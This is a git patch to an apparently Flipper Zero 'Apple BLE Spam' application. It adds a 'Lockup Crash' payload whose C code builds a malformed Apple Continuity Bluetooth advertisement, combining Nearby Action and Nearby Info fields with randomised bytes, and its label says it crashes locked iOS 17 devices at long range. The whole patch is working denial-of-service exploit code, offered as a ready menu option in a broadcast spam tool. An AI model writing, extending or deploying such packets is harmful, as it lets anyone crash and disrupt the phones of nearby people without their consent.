From d2d0f2844917c0617ac86b884e14f4b2b4a92a73 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 1 Oct 2023 01:39:01 +0100 Subject: [PATCH] iOS 17 CRASH for Apple BLE Spam --- .../external/apple_ble_spam/apple_ble_spam.c | 8 +++++++ .../lib/continuity/continuity.c | 22 +++++++++++++++++++ .../lib/continuity/continuity.h | 4 ++++ 3 files changed, 34 insertions(+) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 1ab1c8777..0d38c9ad0 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -184,6 +184,14 @@ static Payload payloads[] = { .data = {.nearby_info = {}}, }}, #endif + {.title = "Lockup Crash", + .text = "iOS 17, locked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeCustomCrash, + .data = {.custom_crash = {}}, + }}, {.title = "Random Action", .text = "Spam shuffle Nearby Actions", .random = true, diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 3d50107b1..9d6856adc 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -1,5 +1,6 @@ #include "continuity.h" #include +#include // Hacked together by @Willy-JL // Custom adv logic by @Willy-JL (idea by @xMasterX) @@ -16,6 +17,7 @@ static const char* continuity_type_names[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = "Tethering Source", [ContinuityTypeNearbyAction] = "Nearby Action", [ContinuityTypeNearbyInfo] = "Nearby Info", + [ContinuityTypeCustomCrash] = "Custom Packet", }; const char* continuity_get_type_name(ContinuityType type) { return continuity_type_names[type]; @@ -30,6 +32,7 @@ static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = HEADER_LEN + 6, [ContinuityTypeNearbyAction] = HEADER_LEN + 5, [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, + [ContinuityTypeCustomCrash] = HEADER_LEN + 11, }; uint8_t continuity_get_packet_size(ContinuityType type) { return continuity_packet_sizes[type]; @@ -135,6 +138,25 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i++] = (rand() % 256); // ... break; + case ContinuityTypeCustomCrash: + i -= 2; // Override segment header + + packet[i++] = ContinuityTypeNearbyAction; // Type + packet[i++] = 0x05; // Length + packet[i++] = 0xC1; // Action Flags + const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0}; + packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; + + packet[i++] = 0x00; // ??? + packet[i++] = 0x00; // ??? + + packet[i++] = ContinuityTypeNearbyInfo; // Type ??? + furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ??? + i += 3; + break; + default: break; } diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index 01a53364c..0437f5834 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -18,6 +18,8 @@ typedef enum { ContinuityTypeTetheringSource = 0x0E, ContinuityTypeNearbyAction = 0x0F, ContinuityTypeNearbyInfo = 0x10, + + ContinuityTypeCustomCrash, ContinuityTypeCount } ContinuityType; @@ -40,6 +42,8 @@ typedef union { } nearby_action; struct { } nearby_info; + struct { + } custom_crash; } ContinuityData; typedef struct {